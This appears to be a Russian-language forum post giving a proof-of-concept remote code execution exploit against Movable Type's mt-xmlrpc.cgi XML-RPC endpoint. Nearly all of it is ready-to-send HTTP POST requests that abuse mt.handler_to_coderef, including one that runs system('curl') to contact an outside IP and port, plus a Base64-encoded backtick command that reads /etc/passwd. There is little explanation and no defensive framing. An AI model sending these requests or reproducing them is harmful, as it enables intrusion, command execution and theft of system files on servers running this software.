Отправьте следующий HTTP-запрос:
Отправьте запрос POST, чтобы попытаться прочитать файл:
Payload:
Изменить полезную нагрузку:
Кодировка Base64:
Код:
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: movable.lan
User-Agent: Partial-code-execution-SOAP
Accept: */*
Content-Length: 97
Connection: close
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>gmtime.anystring
</methodName>
</methodCall>Отправьте запрос POST, чтобы попытаться прочитать файл:
Payload:
Код:
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: movable.lan
User-Agent: PoC-RCE
Accept: */*
Content-Length: 183
Connection: close
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param><value><string>
localtime
</string></value></param>
</params>
</methodCall>Изменить полезную нагрузку:
Код:
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: movable.lan
User-Agent: PoC-RCE
Accept: */*
Content-Length: 214
Connection: close
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param><value><string>system("curl","51.222.24.148:1337/MT-RCE")
</string></value></param>
</params>
</methodCall>Кодировка Base64:
Код:
echo -n '`cat /etc/passwd`'|base64
YGNhdCAvZXRjL3Bhc3N3ZGA=